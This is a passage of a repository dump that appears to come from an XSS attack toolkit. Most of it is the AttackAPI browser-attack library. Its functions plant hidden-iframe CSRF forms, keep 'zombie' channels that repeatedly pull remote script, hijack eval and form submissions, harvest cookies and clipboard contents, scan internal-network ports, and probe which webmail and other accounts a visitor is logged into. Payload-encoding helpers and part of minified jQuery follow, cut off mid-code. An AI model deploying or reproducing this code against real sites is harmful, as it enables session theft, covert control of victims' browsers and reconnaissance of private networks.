758 | return AttackAPI.dom.requestXML(request); 759 | else 760 | return AttackAPI.dom.requestCSRF(request); 761 | }; 762 | 763 | AttackAPI.dom.detachEvent = function (callback, event, target, capturing) { 764 | var target = (target == undefined)?window:target; 765 | var capturing = (capturing == undefined)?false:true; 766 | 767 | if (target.removeEventListener) 768 | target.removeEventListener(event, callback, capturing); 769 | else 770 | target.detachEvent('on' + event, callback); 771 | }; 772 | 773 | AttackAPI.dom.parseXML = function (xml, type) { 774 | if (window.ActiveXObject) { 775 | var xmlDoc = new ActiveXObject('Microsoft.XMLDOM'); 776 | xmlDoc.async = false; 777 | xmlDoc.loadXML(xml); 778 | 779 | return xmlDoc; 780 | } else { 781 | var parser = new DOMParser(); 782 | var xmlDoc = parser.parseFromString(xml, type?type:'text/xml'); 783 | 784 | return xmlDoc; 785 | } 786 | }; 787 | AttackAPI.dom.transport = function (request) { 788 | var url = request.url + '?' + AttackAPI.utils.buildQuery(request.query); 789 | 790 | if (url.length <= 2048) 791 | return AttackAPI.dom.requestIMG(request); 792 | else 793 | return AttackAPI.dom.requestCSRF(AttackAPI.core.extend(request, {method: 'POST'})); 794 | }; 795 | 796 | AttackAPI.dom.spawnZombie = function (zombie) { 797 | var zombie = AttackAPI.dom.spawnChannel(zombie); 798 | 799 | zombie.timer = null; 800 | zombie.interval = (zombie.interval != undefined)?zombie.interval:2000; 801 | 802 | zombie.start = function () { 803 | zombie.stop(); 804 | zombie.timer = window.setInterval(zombie.pull, zombie.interval); 805 | }; 806 | 807 | zombie.stop = function () { 808 | window.clearInterval(zombie.timer); 809 | }; 810 | 811 | return zombie; 812 | }; 813 | 814 | AttackAPI.dom.getAgent = function () { 815 | var agent = ''; 816 | 817 | if (navigator.userAgent) 818 | agent = navigator.userAgent; 819 | else if (navigator.vendor) 820 | agent = navigator.vendor; 821 | else if (window.opera) 822 | agent = 'opera'; 823 | 824 | agent = agent.toLowerCase(); 825 | 826 | if (/webkit/.test(agent)) 827 | return 'safari'; 828 | else if (/opera/.test(agent)) 829 | return 'opera'; 830 | else if (/msie/.test(agent) && !/opera/.test(agent)) 831 | return 'msie'; 832 | else if (/mozilla/.test(agent) && !/(compatible|webkit)/.test(agent)) 833 | return 'mozilla'; 834 | else 835 | return null; 836 | }; 837 | 838 | AttackAPI.dom.getClipboard = function () { 839 | if (window.clipboardData) 840 | return window.clipboardData.getData('Text'); 841 | 842 | return null; 843 | }; 844 | 845 | AttackAPI.dom.hijackEval = function (hijack) { 846 | window.__eval = window.eval; 847 | window.eval = function (expr) { 848 | if (typeof(hijack.oneval) == 'function') 849 | hijack.oneval(expr); 850 | 851 | window.__eval(expr); 852 | }; 853 | }; 854 | AttackAPI.dom.requestJSL = function (url) { 855 | var script = document.createElement('script'); 856 | script.defer = true; 857 | script.type = 'text/javascript'; 858 | script.src = url; 859 | script.onload = script.onerror = function () { 860 | document.body.removeChild(script); 861 | }; 862 | 863 | document.body.appendChild(script); 864 | }; 865 | 866 | AttackAPI.dom.requestIMGL = function (url) { 867 | var img = new Image(); 868 | img.src = url; 869 | }; 870 | 871 | AttackAPI.dom.getXHR = function () { 872 | var xhr = null; 873 | 874 | if (window.XMLHttpRequest) 875 | xhr = new XMLHttpRequest(); 876 | else if (window.createRequest) 877 | xhr = window.createRequest(); 878 | else if (window.ActiveXObject) { 879 | try { 880 | xhr = new ActiveXObject('Msxml2.XMLHTTP'); 881 | } catch (e) { 882 | try { 883 | xhr = new ActiveXObject('Microsoft.XMLHTTP'); 884 | } catch (e) {} 885 | } 886 | } 887 | 888 | return xhr; 889 | }; 890 | AttackAPI.dom.searchGoogle = function (query) { 891 | AttackAPI.dom.requestJSON({ 892 | url: 'http://www.google.com/uds/GwebSearch', 893 | query: { 894 | context: (query.context != undefined)?query.context:0, 895 | key: (query.key != undefined)?query.key:'internal-documentation', 896 | lstkp: 0, rsz: 'large', hl: 'en', v: '0.1', q: query.query 897 | }, 898 | oncallback: query.onresults}); 899 | }; 900 | AttackAPI.dom.getInternalIP = function () { 901 | try { 902 | var sock = new java.net.Socket(); 903 | 904 | sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0)); 905 | sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port)); 906 | 907 | return sock.getLocalAddress().getHostAddress(); 908 | } catch (e) {} 909 | 910 | return '127.0.0.1'; 911 | }; 912 | 913 | AttackAPI.dom.requestCSRF = function (request) { 914 | var tmr = null; 915 | 916 | var ifr = document.createElement('iframe'); 917 | ifr.style.visibility = 'hidden'; 918 | ifr.style.width = ifr.style.height = 0; 919 | 920 | document.body.appendChild(ifr); 921 | 922 | var doc = AttackAPI.dom.getDocument(ifr); 923 | 924 | var form = document.createElement('form'); 925 | form.setAttribute('method', request.method?request.method:'GET'); 926 | form.setAttribute('action', request.url); 927 | 928 | for (var name in request.query) { 929 | var input = document.createElement('input'); 930 | input.setAttribute('name', name); 931 | input.setAttribute('value', request.query[name]); 932 | input.setAttribute('type', 'text'); 933 | 934 | form.appendChild(input); 935 | } 936 | 937 | doc.body.appendChild(form); 938 | 939 | ifr.onload = function () { 940 | window.clearTimeout(tmr); 941 | 942 | var data = null; 943 | 944 | try { 945 | data = AttackAPI.dom.getDocument(ifr).body.innerHTML; 946 | } catch (e) {} 947 | 948 | ifr.src = ''; 949 | document.body.removeChild(ifr); 950 | 951 | if (typeof(request.onload) == 'function') 952 | request.onload({data: data}, request); 953 | }; 954 | 955 | tmr = window.setTimeout(function () { 956 | document.body.removeChild(ifr); 957 | 958 | if (typeof(request.ontimeout) == 'function') 959 | request.ontimeout(request); 960 | }, request.timeout?request.timeout:10000); 961 | 962 | form.submit(); 963 | }; 964 | 965 | AttackAPI.dom.scanStates = function (scan) { 966 | var signatures = (scan.signatures != undefined)?scan.signatures:AttackAPI.dom.signatures.states; 967 | var timeout = (scan.timeout != undefined)?scan.timeout:5000; 968 | var timers = []; 969 | var count = 0; 970 | 971 | var sandbox = AttackAPI.dom.spawnSandbox({ 972 | onerror: function (message, url, line) { 973 | count += 1; 974 | 975 | for (var i = 0; i < signatures.length; i++) 976 | if ((!signatures[i].message || new RegExp(signatures[i].message).exec(message)) && (!signatures[i].url || signatures[i].url == url) && (signatures[i].line == undefined || signatures[i].line == line)) { 977 | window.clearTimeout(timers[i]); 978 | 979 | if (typeof(scan.onfound) == 'function') 980 | scan.onfound(signatures[i], scan); 981 | 982 | break; 983 | } 984 | 985 | if (count == signatures.length && typeof(scan.oncomplete) == 'function') { 986 | scan.oncomplete(); 987 | sandbox.terminate(); 988 | } 989 | 990 | return true; 991 | }, 992 | inject: function(url) { 993 | var script = sandbox.scope.document.createElement('script'); 994 | script.type = 'text/javascript'; 995 | script.defer = true; 996 | script.src = url; 997 | 998 | sandbox.scope.document.body.appendChild(script); 999 | } 1000 | }); 1001 | 1002 | for (var i = 0; i < signatures.length; i++) { 1003 | sandbox.evaluate("inject('" + signatures[i].url + "')"); 1004 | timers.push(window.setTimeout(AttackAPI.core.bindFunction(function (signature) { 1005 | count += 1; 1006 | 1007 | if (typeof(scan.ontimeout) == 'function') 1008 | scan.ontimeout(signature); 1009 | 1010 | if (count == signatures.length) { 1011 | sandbox.terminate(); 1012 | 1013 | if (typeof(scan.oncomplete) == 'function') 1014 | scan.oncomplete(); 1015 | } 1016 | }, signatures[i]), timeout)); 1017 | } 1018 | }; 1019 | 1020 | AttackAPI.dom.requestXML = function (request) { 1021 | var xhr = AttackAPI.dom.getXHR(); 1022 | 1023 | if (!xhr) { 1024 | if (typeof(request.onerror) == 'function') 1025 | request.onerror('request implementation not found', request); 1026 | 1027 | return; 1028 | } 1029 | 1030 | var tmr = window.setTimeout(function () { 1031 | xhr.abort(); 1032 | 1033 | if (typeof(request.ontimeout) == 'function') 1034 | request.ontimeout(request); 1035 | }, request.timeout?request.timeout:10000); 1036 | 1037 | xhr.onreadystatechange = function () { 1038 | if (xhr.readyState == 4) { 1039 | window.clearTimeout(tmr); 1040 | 1041 | if (typeof(request.onload) == 'function') 1042 | request.onload({status: xhr.status, data: xhr.responseText, dataXML: xhr.responseXML, headers: xhr.getAllResponseHeaders()}, request); 1043 | } 1044 | }; 1045 | 1046 | try { 1047 | var method = request.method?request.method:'GET'; 1048 | var url = request.url + (method == 'GET' && request.query?'?' + AttackAPI.utils.buildQuery(request.query):''); 1049 | 1050 | xhr.open(method, url); 1051 | 1052 | if (request.headers) 1053 | for (var header in request.headers) 1054 | xhr.setRequestHeader(header, request.headers[header]); 1055 | 1056 | xhr.send(request.body?request.body:(method != 'GET' && request.query?AttackAPI.utils.buildQuery(request.query):null)); 1057 | } catch (e) { 1058 | if (typeof(request.onerror) == 'function') 1059 | request.onerror(e, request); 1060 | 1061 | return; 1062 | } 1063 | }; 1064 | 1065 | AttackAPI.dom.getCookie = function (cookie) { 1066 | var tokens = document.cookie.split(';'); 1067 | 1068 | for (var index = 0; index < tokens.length; index++) { 1069 | var pair = tokens[index].replace(/^\s*/, ''); 1070 | 1071 | if (cookie == unescape(pair.substring(0, name.length))) 1072 | return unescape(pair.substring(name.length + 1)); 1073 | } 1074 | 1075 | return null; 1076 | }; 1077 | 1078 | AttackAPI.dom.setClipboard = function (value) { 1079 | if (window.clipboardData) 1080 | return window.clipboardData.getData('Text', value); 1081 | 1082 | return null; 1083 | }; 1084 | 1085 | AttackAPI.dom.sweepPorts = function (sweep) { 1086 | var range = AttackAPI.utils.net2range(sweep.network); 1087 | var length = range.stop - range.start; 1088 | var count = 0; 1089 | 1090 | for (var i = range.start; i <= range.stop; i++) 1091 | AttackAPI.dom.scanPorts({target: AttackAPI.utils.number2ip(i), ports: sweep.ports, timeout: sweep.timeout, 1092 | onfound: function (port, scan) { 1093 | if (typeof(sweep.onfound) == 'function') 1094 | sweep.onfound({ip: scan.target, port: port}, sweep); 1095 | }, 1096 | ontimeout: function (port) { 1097 | if (typeof(sweep.ontimeout) == 'function') 1098 | sweep.ontimeout({ip: scan.target, port: port}, sweep); 1099 | }, 1100 | oncomplete: function () { 1101 | count += 1; 1102 | 1103 | if (count == length && typeof(sweep.oncomplete) == 'function') 1104 | sweep.oncomplete(sweep); 1105 | } 1106 | }); 1107 | }; 1108 | AttackAPI.dom.scanPorts = function (scan) { 1109 | var ports = (scan.ports != undefined)?scan.ports:AttackAPI.dom.signatures.ports; 1110 | var timeout = (scan.timeout != undefined)?scan.timeout:900; 1111 | 1112 | function check(port, index, length) { 1113 | var img = new Image(); 1114 | img.onload = img.onerror = function () { 1115 | if (!img) return; 1116 | img = undefined; 1117 | 1118 | if (typeof(scan.onfound) == 'function') 1119 | scan.onfound(port, scan); 1120 | 1121 | if (index == length - 1 && typeof(scan.oncomplete) == 'function') 1122 | scan.oncomplete(scan); 1123 | }; 1124 | img.src = 'http://' + scan.target + ':' + port; 1125 | 1126 | window.setTimeout(function () { 1127 | if (!img) return; 1128 | img = undefined; 1129 | 1130 | if (typeof(scan.ontimeout) == 'function') 1131 | scan.ontimeout(port, scan); 1132 | 1133 | if (index == length - 1 && typeof(scan.oncomplete) == 'function') 1134 | scan.oncomplete(scan); 1135 | }, timeout); 1136 | } 1137 | 1138 | for (var i = 0; i < ports.length; i++) 1139 | check(ports[i], i, ports.length); 1140 | }; 1141 | 1142 | AttackAPI.dom.hijackForm = function (hijack) { 1143 | if (!hijack.form.id) 1144 | hijack.form.id = ('form_' + Math.random() + '_' + new Date().getTime()).replace('.', '_'); 1145 | 1146 | hijack.form.__hijackForm = function (url) { 1147 | this.action = url; 1148 | 1149 | if (typeof(hijack.onsubmit) == 'function') 1150 | hijack.onsubmit.apply(this, []); 1151 | 1152 | this.submit(); 1153 | }; 1154 | 1155 | hijack.form.action = "javascript:document.getElementById('" + hijack.form.id + "').__hijackForm('" + hijack.form.action + "')"; 1156 | }; 1157 | 1158 | AttackAPI.dom.getPlugins = function () { 1159 | var plugins = new Array(); 1160 | 1161 | for (var index = 0; index < navigator.plugins.length; index++) 1162 | plugins.push(navigator.plugins[index].name); 1163 | 1164 | return plugins; 1165 | }; 1166 | 1167 | AttackAPI.dom.requestJSON = function (request) { 1168 | if (AttackAPI.dom.requestJSON.callbacks == undefined) 1169 | AttackAPI.dom.requestJSON.callbacks = {}; 1170 | 1171 | var callbackName = 'c' + new Date().getTime(); 1172 | AttackAPI.dom.requestJSON.callbacks[callbackName] = function () { 1173 | if (typeof(request.oncallback) == 'function') 1174 | request.oncallback.apply(request, arguments); 1175 | }; 1176 | 1177 | var query = request.query?request.query:{}; 1178 | query[request.callback?request.callback:'callback'] = 'AttackAPI.dom.requestJSON.callbacks.' + callbackName; 1179 | 1180 | AttackAPI.dom.requestJSL(request.url + '?' + AttackAPI.utils.buildQuery(query)); 1181 | }; 1182 | AttackAPI.dom.include = function (url, onload) { 1183 | var script = document.createElement('script'); 1184 | script.type = 'text/javascript'; 1185 | script.defer = true; 1186 | script.src = url; 1187 | script.onload = function () { 1188 | document.body.removeChild(script); 1189 | 1190 | if (typeof(onload) == 'function') 1191 | onload.apply(script, arguments); 1192 | }; 1193 | 1194 | document.body.appendChild(script); 1195 | }; 1196 | 1197 | AttackAPI.dom.hijackView = function (obj) { 1198 | var doc = obj.document?obj.document:AttackAPI.dom.getDocument(); 1199 | 1200 | var ifr = doc.createElement('iframe'); 1201 | ifr.onload = obj.onload; 1202 | ifr.src = obj.url?obj.url:doc.location; 1203 | 1204 | doc.body.scroll = 'no'; 1205 | doc.body.appendChild(ifr); 1206 | 1207 | ifr.style.position = 'absolute'; 1208 | ifr.style.width = ifr.style.height = '100%'; 1209 | ifr.style.top = ifr.style.left = ifr.style.border = 0; 1210 | ifr.style.background = '#FFFFFF'; 1211 | 1212 | ifr.focus(); 1213 | 1214 | return ifr; 1215 | }; 1216 | AttackAPI.dom.getPlatform = function () { 1217 | return navigator.platform.toLowerCase(); 1218 | }; 1219 | 1220 | AttackAPI.dom.setCookie = function (cookie, value, expires, path, domain, secure) { 1221 | document.cookie = cookie + '=' + escape(value) + 1222 | ((expires == undefined)?'':'; expires=' + expires) + 1223 | ((path == undefined)?'':'; path=' + path) + 1224 | ((domain == undefined)?'':'; domain=' + domain) + 1225 | ((secure == undefined)?'':'; secure=' + secure); 1226 | }; 1227 | 1228 | AttackAPI.dom.getCookies = function () { 1229 | var cookies = new Object(); 1230 | var tokens = document.cookie.split(';'); 1231 | 1232 | for (var index = 0; index < tokens.length; index++) { 1233 | var pair = tokens[index].split('='); 1234 | 1235 | if (pair[1] && !(pair[0] in cookies)) 1236 | cookies[unescape(pair[0])] = unescape(pair[1]); 1237 | } 1238 | 1239 | return cookies; 1240 | }; 1241 | 1242 | AttackAPI.dom.delCookie = function (cookie) { 1243 | return document.cookie = name + '=' + null; 1244 | }; 1245 | 1246 | AttackAPI.dom.zombiefyL = function (url, interval) { 1247 | var interval = (interval == 'undefined')?interval:2000; 1248 | 1249 | window.setInterval(function () { 1250 | AttackAPI.dom.requestJSL(url + '?action=pull'); 1251 | }, interval); 1252 | }; 1253 | 1254 | AttackAPI.dom.requestXSSL = function (url) { 1255 | var ifr = document.createElement('iframe'); 1256 | ifr.style.visibility = 'hidden'; 1257 | ifr.style.width = ifr.style.height = 0; 1258 | ifr.src = url; 1259 | 1260 | document.body.appendChild(ifr); 1261 | }; 1262 | 1263 | AttackAPI.dom.getInternalNetworkInfo = function () { 1264 | var info = {hostname: 'localhost', IP: '127.0.0.1'}; 1265 | 1266 | try { 1267 | var sock = new java.net.Socket(); 1268 | 1269 | sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0)); 1270 | sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port)); 1271 | 1272 | info.IP = sock.getLocalAddress().getHostAddress(); 1273 | info.hostname = sock.getLocalAddress().getHostName(); 1274 | } catch (e) {} 1275 | 1276 | return info; 1277 | }; 1278 | 1279 | AttackAPI.dom.signatures = new Object(); 1280 | 1281 | AttackAPI.dom.signatures.ports = [ 1282 | 21, 22, 23, 25, 53, 80, 110, 118, 137, 139, 143, 161, 389, 443, 445, 547, 8000, 8008, 8080, 8888]; 1283 | 1284 | AttackAPI.dom.signatures.sites = [ 1285 | 'http://www.yahoo.com/', 1286 | 'http://www.google.com/', 1287 | 'http://www.myspace.com/', 1288 | 'http://www.msn.com/', 1289 | 'http://www.ebay.com/', 1290 | 'http://www.youtube.com/', 1291 | 'http://www.facebook.com/', 1292 | 'http://www.wikipedia.org/', 1293 | 'http://www.craigslist.org/', 1294 | 'http://www.amazon.com/', 1295 | 'http://www.live.com/', 1296 | 'http://www.blogger.com/', 1297 | 'http://www.aol.com/', 1298 | 'http://www.cnn.com/', 1299 | 'http://www.go.com/', 1300 | 'http://www.microsoft.com/', 1301 | 'http://www.comcast.net/', 1302 | 'http://www.imdb.com/', 1303 | 'http://www.weather.com/', 1304 | 'http://www.digg.com/']; 1305 | 1306 | AttackAPI.dom.signatures.extensions = [ 1307 | {name: 'Adblock Plus', url: 'chrome://adblockplus/skin/adblockplus.png'}, 1308 | {name: 'Customize Google', url: 'chrome://customizegoogle/skin/32x32.png'}, 1309 | {name: 'DownThemAll!', url: 'chrome://dta/content/immagini/icon.png'}, 1310 | {name: 'Faster Fox', url: 'chrome://fasterfox/skin/icon.png'}, 1311 | {name: 'Flash Block', url: 'chrome://flashblock/skin/flash-on-24.png'}, 1312 | {name: 'FlashGot', url: 'chrome://flashgot/skin/icon32.png'}, 1313 | {name: 'Google Toolbar', url: 'chrome://google-toolbar/skin/icon.png'}, 1314 | {name: 'Greasemonkey', url: 'chrome://greasemonkey/content/status_on.gif'}, 1315 | {name: 'IE Tab', url: 'chrome://ietab/skin/ietab-button-ie16.png'}, 1316 | {name: 'IE View', url: 'chrome://ieview/skin/ieview-icon.png'}, 1317 | {name: 'JS View', url: 'chrome://jsview/skin/jsview.gif'}, 1318 | {name: 'Live HTTP Headers', url: 'chrome://livehttpheaders/skin/img/Logo.png'}, 1319 | {name: 'SEO For Firefox', url: 'chrome://seo4firefox/content/icon32.png'}, 1320 | {name: 'Search Status', url: 'chrome://searchstatus/skin/cax10.png'}, 1321 | {name: 'Server Switcher', url: 'chrome://switcher/skin/icon.png'}, 1322 | {name: 'StumbleUpon', url: 'chrome://stumbleupon/content/skin/logo32.png'}, 1323 | {name: 'Torrent-Search Toolbar', url: 'chrome://torrent-search/skin/v.png'}, 1324 | {name: 'User Agent Switcher', url: 'chrome://useragentswitcher/content/logo.png'}, 1325 | {name: 'View Source With', url: 'chrome://viewsourcewith/skin/ff/tb16.png'}, 1326 | {name: 'Web Developer', url: 'chrome://webdeveloper/content/images/logo.png'}]; 1327 | 1328 | AttackAPI.dom.signatures.states = [ 1329 | {name: 'Google Logged In User', url: 'https://www.google.com/accounts/ManageAccount', message: 'XML tag name mismatch', line: 91}, 1330 | {name: 'GMail Logged In User', url: 'http://mail.google.com/mail/', message: 'XML tag name mismatch', line: 8}, 1331 | {name: 'MSN Logged In User', url: 'http://my.msn.com/', message: 'missing } in XML expression', line: 1}, 1332 | {name: 'Hotmail Logged In User', url: 'http://www.hotmail.com/', message: 'missing } in XML expression', line: 1}, 1333 | {name: 'Yahoo Mail Logged In User', url: 'http://mail.yahoo.com/', message: 'missing } in XML expression', line: 12}, 1334 | {name: 'Flickr Logged In User', url: 'http://www.flickr.com/account', message: 'syntax error', line: 1}]; 1335 | 1336 | /* hook on $A */ 1337 | if ($A == undefined) { 1338 | var $A = {}; 1339 | 1340 | for (var item in AttackAPI) { 1341 | if (item == 'version' || item == 'author' || item == 'homepage' || item == 'projecthome') 1342 | continue; 1343 | 1344 | AttackAPI.core.extend($A, AttackAPI[item]); 1345 | } 1346 | } -------------------------------------------------------------------------------- /lib/core.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/evilcos/xssor/72a985dfb41d94aa6d147d1dd1829833fd089888/lib/core.js -------------------------------------------------------------------------------- /lib/encode.js: -------------------------------------------------------------------------------- 1 | //code by yuxi4n 2 | 3 | knownxss.encode = {}; 4 | knownxss.encode._escape = function(){_g('Ww_B_0_textarea').value=escape(_g('Ww_B_0_textarea').value);} 5 | knownxss.encode._unescape = function(){_g('Ww_B_0_textarea').value=unescape(_g('Ww_B_0_textarea').value);} 6 | knownxss.encode._encodeURI = function(){_g('Ww_B_0_textarea').value=encodeURI(_g('Ww_B_0_textarea').value);} 7 | knownxss.encode._decodeURI = function(){_g('Ww_B_0_textarea').value=decodeURI(_g('Ww_B_0_textarea').value);} 8 | knownxss.encode.en = function(x){ 9 | var _a=new Array(); 10 | var txt=_g('Ww_B_0_textarea').value; 11 | if(x==10){ 12 | for(i=0;i/g,'>'); 81 | if (i == 2) 82 | _g('Ww_B_0_textarea').value=txt.replace(/&/g, '&').replace(/"/g, '\"').replace(/</g,'<').replace(/>/g, '>'); 83 | } 84 | var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 85 | var base64DecodeChars = new Array(-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 86 | -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 87 | -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57, 88 | 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 89 | 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 90 | 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 91 | 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, 92 | -1, -1); 93 | 94 | knownxss.encode.base64encode = function(str){ 95 | var out, i, len; 96 | var c1, c2, c3; 97 | len = str.length; 98 | i = 0; 99 | out = ""; 100 | while (i < len){ 101 | c1 = str.charCodeAt(i++) & 0xff; 102 | if (i == len){ 103 | out += base64EncodeChars.charAt(c1 >> 2); 104 | out += base64EncodeChars.charAt((c1 & 0x3) << 4); 105 | out += "=="; 106 | break; 107 | } 108 | c2 = str.charCodeAt(i++); 109 | if (i == len){ 110 | out += base64EncodeChars.charAt(c1 >> 2); 111 | out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4)); 112 | out += base64EncodeChars.charAt((c2 & 0xF) << 2); 113 | out += "="; 114 | break; 115 | } 116 | c3 = str.charCodeAt(i++); 117 | out += base64EncodeChars.charAt(c1 >> 2); 118 | out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4)); 119 | out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6)); 120 | out += base64EncodeChars.charAt(c3 & 0x3F); 121 | } 122 | return out; 123 | } 124 | knownxss.encode.base64decode = function(str){ 125 | var c1, c2, c3, c4; 126 | var i, len, out; 127 | len = str.length; 128 | i = 0; 129 | out = ""; 130 | while (i < len){ 131 | do 132 | { 133 | c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff] 134 | } while (i < len && c1 == -1); 135 | 136 | if (c1 == -1) 137 | break; 138 | do 139 | { 140 | c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff] 141 | } while (i < len && c2 == -1); 142 | 143 | if (c2 == -1) 144 | break; 145 | out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4)); 146 | do 147 | { 148 | c3 = str.charCodeAt(i++) & 0xff; 149 | 150 | if (c3 == 61) 151 | return out; 152 | c3 = base64DecodeChars[c3]; 153 | } while (i < len && c3 == -1); 154 | if (c3 == -1) 155 | break; 156 | out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2)); 157 | do 158 | { 159 | c4 = str.charCodeAt(i++) & 0xff; 160 | if (c4 == 61) 161 | return out; 162 | c4 = base64DecodeChars[c4] 163 | } while (i < len && c4 == -1); 164 | if (c4 == -1) 165 | break; 166 | out += String.fromCharCode(((c3 & 0x03) << 6) | c4) 167 | } 168 | return out; 169 | } 170 | knownxss.encode.utf16to8 = function(str) 171 | { 172 | var out, i, len, c; 173 | out = ""; 174 | len = str.length; 175 | for (i = 0; i < len; i++){ 176 | c = str.charCodeAt(i); 177 | if ((c >= 0x0001) && (c <= 0x007F)){ 178 | out += str.charAt(i); 179 | } 180 | else if (c > 0x07FF){ 181 | out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F)); 182 | out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F)); 183 | out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F)); 184 | } 185 | else{ 186 | out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F)); 187 | out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F)); 188 | } 189 | } 190 | return out; 191 | } 192 | knownxss.encode.utf8to16 = function(str){ 193 | var out, i, len, c; 194 | var char2, char3; 195 | out = ""; 196 | len = str.length; 197 | i = 0; 198 | while (i < len){ 199 | c = str.charCodeAt(i++); 200 | switch (c >> 4){ 201 | case 0: 202 | case 1: 203 | case 2: 204 | case 3: 205 | case 4: 206 | case 5: 207 | case 6: 208 | case 7: 209 | out += str.charAt(i - 1); 210 | break; 211 | case 12: 212 | case 13: 213 | char2 = str.charCodeAt(i++); 214 | out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F)); 215 | break; 216 | case 14: 217 | char2 = str.charCodeAt(i++); 218 | char3 = str.charCodeAt(i++); 219 | out += String.fromCharCode(((c & 0x0F) << 12) | ((char2 & 0x3F) << 6) 220 | | ((char3 & 0x3F) << 0)); 221 | break; 222 | } 223 | } 224 | return out; 225 | } 226 | knownxss.encode.base64Code = function(i){ 227 | var txt=_g('Ww_B_0_textarea').value; 228 | if (i == 1) 229 | _g('Ww_B_0_textarea').value=knownxss.encode.base64encode(knownxss.encode.utf16to8(txt)); 230 | if (i == 2) 231 | _g('Ww_B_0_textarea').value=knownxss.encode.utf8to16(knownxss.encode.base64decode(txt)); 232 | } 233 | knownxss.encode.replaceC = function(){ 234 | var txt=_g('Ww_B_0_textarea').value; 235 | var _t = new Array(); 236 | var oldV = _g('oldC').value; 237 | var newV = _g('newC').value; 238 | var s = txt.split(oldV); 239 | if(s.length>1){ 240 | if(s[0]==''){ 241 | for (i=1;i)[^>]*$|^#(\w+)$/;var isSimple=/^.[^:#\[\.]*$/;jQuery.fn=jQuery.prototype={init:function(selector,context){selector=selector||document;if(selector.nodeType){this[0]=selector;this.length=1;return this;}else if(typeof selector=="string"){var match=quickExpr.exec(selector);if(match&&(match[1]||!context)){if(match[1])selector=jQuery.clean([match[1]],context);else{var elem=document.getElementById(match[3]);if(elem)if(elem.id!=match[3])return jQuery().find(selector);else{this[0]=elem;this.length=1;return this;}else 12 | selector=[];}}else 13 | return new jQuery(context).find(selector);}else if(jQuery.isFunction(selector))return new jQuery(document)[jQuery.fn.ready?"ready":"load"](selector);return this.setArray(selector.constructor==Array&&selector||(selector.jquery||selector.length&&selector!=window&&!selector.nodeType&&selector[0]!=undefined&&selector[0].nodeType)&&jQuery.makeArray(selector)||[selector]);},jquery:"1.2.3",size:function(){return this.length;},length:0,get:function(num){return num==undefined?jQuery.makeArray(this):this[num];},pushStack:function(elems){var ret=jQuery(elems);ret.prevObject=this;return ret;},setArray:function(elems){this.length=0;Array.prototype.push.apply(this,elems);return this;},each:function(callback,args){return jQuery.each(this,callback,args);},index:function(elem){var ret=-1;this.each(function(i){if(this==elem)ret=i;});return ret;},attr:function(name,value,type){var options=name;if(name.constructor==String)if(value==undefined)return this.length&&jQuery[type||"attr"](this[0],name)||undefined;else{options={};options[name]=value;}return this.each(function(i){for(name in options)jQuery.attr(type?this.style:this,name,jQuery.prop(this,options[name],type,i,name));});},css:function(key,value){if((key=='width'||key=='height')&&parseFloat(value)<0)value=undefined;return this.attr(key,value,"curCSS");},text:function(text){if(typeof text!="object"&&text!=null)return this.empty().append((this[0]&&this[0].ownerDocument||document).createTextNode(text));var ret="";jQuery.each(text||this,function(){jQuery.each(this.childNodes,function(){if(this.nodeType!=8)ret+=this.nodeType!=1?this.nodeValue:jQuery.fn.text([this]);});});return ret;},wrapAll:function(html){if(this[0])jQuery(html,this[0].ownerDocument).clone().insertBefore(this[0]).map(function(){var elem=this;while(elem.firstChild)elem=elem.firstChild;return elem;}).append(this);return this;},wrapInner:function(html){return this.each(function(){jQuery(this).contents().wrapAll(html);});},wrap:function(html){return this.each(function(){jQuery(this).wrapAll(html);});},append:function(){return this.domManip(arguments,true,false,function(elem){if(this.nodeType==1)this.appendChild(elem);});},prepend:function(){return this.domManip(arguments,true,true,function(elem){if(this.nodeType==1)this.insertBefore(elem,this.firstChild);});},before:function(){return this.domManip(arguments,false,false,function(elem){this.parentNode.insertBefore(elem,this);});},after:function(){return this.domManip(arguments,false,true,function(elem){this.parentNode.insertBefore(elem,this.nextSibling);});},end:function(){return this.prevObject||jQuery([]);},find:function(selector){var elems=jQuery.map(this,function(elem){return jQuery.find(selector,elem);});return this.pushStack(/[^+>] [^+>]/.test(selector)||selector.indexOf("..")>-1?jQuery.unique(elems):elems);},clone:function(events){var ret=this.map(function(){if(jQuery.browser.msie&&!jQuery.isXMLDoc(this)){var clone=this.cloneNode(true),container=document.createElement("div");container.appendChild(clone);return jQuery.clean([container.innerHTML])[0];}else 14 | return this.cloneNode(true);});var clone=ret.find("*").andSelf().each(function(){if(this[expando]!=undefined)this[expando]=null;});if(events===true)this.find("*").andSelf().each(function(i){if(this.nodeType==3)return;var events=jQuery.data(this,"events");for(var type in events)for(var handler in 